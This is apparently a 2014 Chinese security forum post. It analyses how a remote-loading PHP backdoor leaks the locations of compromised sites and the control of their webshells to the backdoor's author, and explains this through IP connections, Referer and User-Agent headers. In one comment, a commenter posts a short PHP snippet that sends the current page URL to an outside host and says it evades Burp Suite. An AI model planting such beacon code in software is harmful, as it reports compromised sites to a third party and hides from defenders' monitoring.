“一款猥琐的PHP后门”的后门可能存在的分析

  • A+
所属分类:网络安全

 写在开头,说好给我开发帖权限的。还是只把“发表新话题”按钮显示出来,点进去还是没有发帖权向“没有此领域的发表内容权限”。只好找以前的帖子,重新编辑,还好我是领主! 

1.都知道Windows和现实中,有人叫你,那么就会知道谁在叫你,在哪个地方。 
HTTP TCP 协议,两个建立连接,socket中是保存了两个的IP和端口号的,可以在cmd中netstat -an查看到 
TCP    192.168.1.104:54618    220.181.136.33:80      ESTABLISHED。 
那么“猥琐的PHP后门”要从服务端获取代码,就建立了连接,服务端就可以看到,谁找我要代码,IP是多少,这个IP就是你植入的后门的IP。作者可以知道哪些站被植入了我的后门代码。file_get_contents能知道的只有这些了。 


2.我们知道<script src,加载一个JS代码,这里能看到就比1里面多了,除IP等外,比如HTTP_REFERER,来源。HTTP_USER_AGENT浏览器标识,等等。HTTP_REFERER就可以直接看到,webshell的地址。比通过IP查询同IP站点容易多。 


3.webshell的密码,我没实际分析代码只是看到别人的解密一部分,不知道有没有密码什么的。那么这个密码,就不用说了,你代码都是通过“我”这里获取的,我让密码是多少就是多少,让你不用密码都是可以的。

/**--------------------------------------------------------------*/

 1#俺是农村的 | 2014-03-23 23:23
@xsser
 
2#safe121 | 2014-03-24 00:36
en, diyiban ASPXSPY jiu jiazai yige IMG, ranhou zuozhe jiuneng kandao IMG de diazhi ,ranhou liyong houmen jinqu ...
 
3#回复此人 | 2014-03-24 16:45
如果是我,我会这样写,至少burpsuite应该抓不到吧
$url="http://".$_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$url2="http://www.test.com/t.php?URL=".$url
$contents = file_get_contents($url2);

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: